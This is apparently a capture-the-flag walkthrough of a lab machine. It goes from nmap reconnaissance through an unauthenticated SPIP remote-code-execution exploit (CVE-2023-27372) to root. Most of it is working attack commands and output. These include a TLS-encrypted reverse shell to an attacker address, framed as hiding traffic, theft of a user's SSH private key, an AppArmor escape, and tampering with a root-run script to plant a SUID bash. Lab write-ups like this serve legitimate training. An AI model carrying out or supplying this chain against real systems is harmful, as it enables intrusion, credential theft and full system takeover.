Let's see what ports are open -
nmap -sVC -T4 10.10.210.141
Nmap scan report for 10.10.210.141
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Publisher's Pulse: SPIP Insights & Tips
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
As per the hint in the challenge description (and the SPIP title nmap reports on port 80), we search for a SPIP RCE exploit:
searchsploit spip
SPIP v4.2.0 - Remote Code Execution (Unauthenticated) | php/webapps/51536.py
We use this GitHub PoC for CVE-2023-27372 (unauthenticated RCE in SPIP before 4.2.1, reached through the public spip_pass password-reset form) to get the initial foothold:
git clone https://github.com/0SPwn/CVE-2023-27372-PoC
cd CVE-2023-27372-PoC
pip install -r requirements.txt
python3 exploit.py -u "http://10.10.210.141/spip/spip.php?page=spip_pass&lang=fr"
Getting a reverse shell. Rather than a plaintext nc listener, wrap the shell in TLS with openssl so the traffic is not readable on the wire.
On the attacker (self-signed cert, then listen on 1337):
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 1337
On the victim (10.8.47.242 is the attacker's address), run through the exploit's command execution:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.8.47.242:1337 > /tmp/s; rm /tmp/s
Stabilize the shell:
script -qc /bin/bash /dev/null
Or, for a proper shell, grab the private key of the user think and log in over SSH with it (set the copied key to mode 600 on the attacker side first):
cat /home/think/.ssh/id_rsa
Privesc to root.
The shell we land in is confined by an AppArmor profile, so the first step is to escape it with the Perl shebang bypass from the HackTricks AppArmor page: the script is executed through its #!/usr/bin/perl interpreter rather than by the confined shell. The POSIX::setuid(0) call is carried over from the HackTricks example; as an unprivileged user it simply fails (it returns undef and is not checked), and exec still drops you into an unconfined sh as think.
echo '#!/usr/bin/perl
use POSIX qw(strftime);
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/sh"' > /dev/shm/test.pl
chmod +x /dev/shm/test.pl
/dev/shm/test.pl
Next, hunt for SUID binaries; /usr/sbin/run_container is not a stock Ubuntu binary and stands out:
find / -perm /4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/sbin/run_container <-----
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
Running /usr/sbin/run_container. It turns out to be a SUID wrapper around /opt/run_container.sh; the error below (a function the script calls but never defines) leaks the script path and shows it is custom and worth reading:
think@publisher:~$ run_container
List of Docker containers:
ID: 41c976e507f8 | Name: jovial_hertz | Status: Up 17 minutes
Enter the ID of the container or leave blank to create a new one: 41c976e507f8
/opt/run_container.sh: line 16: validate_container_id: command not found <---------
OPTIONS:
1) Start Container
2) Stop Container
3) Restart Container
4) Create Container
5) Quit
Choose an action for a container:
Editing /opt/run_container.sh to get root. The SUID wrapper executes this script as root, and the script is writable from the unconfined shell, so add two lines to it that plant a SUID copy of bash:
cp /usr/bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
Then run the wrapper, pick the existing container and action 3 (Restart Container) so the edited script executes as root, and start the planted shell with -p so bash keeps the effective uid instead of dropping it:
/usr/sbin/run_container
41c976e507f8
3
/tmp/rootbash -p
bash-5.0# whoami
root